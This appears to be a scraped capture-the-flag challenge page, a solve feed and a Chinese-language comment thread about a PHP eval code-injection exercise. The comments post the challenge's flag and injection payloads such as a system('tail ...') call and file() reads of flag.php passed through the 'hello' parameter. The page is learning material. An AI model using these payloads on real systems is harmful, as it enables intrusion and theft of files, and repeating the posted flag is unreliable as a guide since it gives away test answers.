评分(9)
解题动态
h27111111 攻破了该题 6小时前
fujima 攻破了该题 6小时前
asusbugku 攻破了该题 8小时前
pbfaljx 攻破了该题 8小时前
15630893677 攻破了该题 9小时前
zcailss 攻破了该题 9小时前
ZZZZZaaa 攻破了该题 14小时前
abandon006 攻破了该题 15小时前
landon298 攻破了该题 17小时前
ifnoif 攻破了该题 1天前
YaaaaaanG 攻破了该题 1天前
5013230204 攻破了该题 1天前
bugku111rao 攻破了该题 1天前
lyf 攻破了该题 1天前
18227956629 攻破了该题 1天前
rainstar 攻破了该题 1天前
Zhumeng 攻破了该题 1天前
fuhao1209 攻破了该题 1天前
miracles 攻破了该题 1天前
评论
acela 1年前
举报
flag{932241d0a39e2c7a1fe31a9a7dd89594};
wenroudeyanhuo 2年前
举报
please input a?
aoikuuun 2年前
举报
/?hello=system("tail%20-n%202%20flag.php")
GH0S7 2年前
举报
我真棒
K463726543 2年前
举报
hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。
SecI302 2年前
举报
踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容
Cat00011cat 2年前
举报
http://114.67.175.224:10794/?hello=file(%27flag.php%27)
musewithwind 1年前
举报
@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了
D4C 2年前
举报
大佬能不能给小白讲讲原理啊
小王爱吃螺蛳粉 2年前
举报
有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来
风灵丨玉秀 2年前
举报
/?hello="flag.php"
cattact 2年前
举报
知识点: 1.$a= @$_REQUEST['hello']Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 2.eval("var_dump($a);")就是把$a的内容打印出来 3.file()解释: file(path,include_path,context) 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换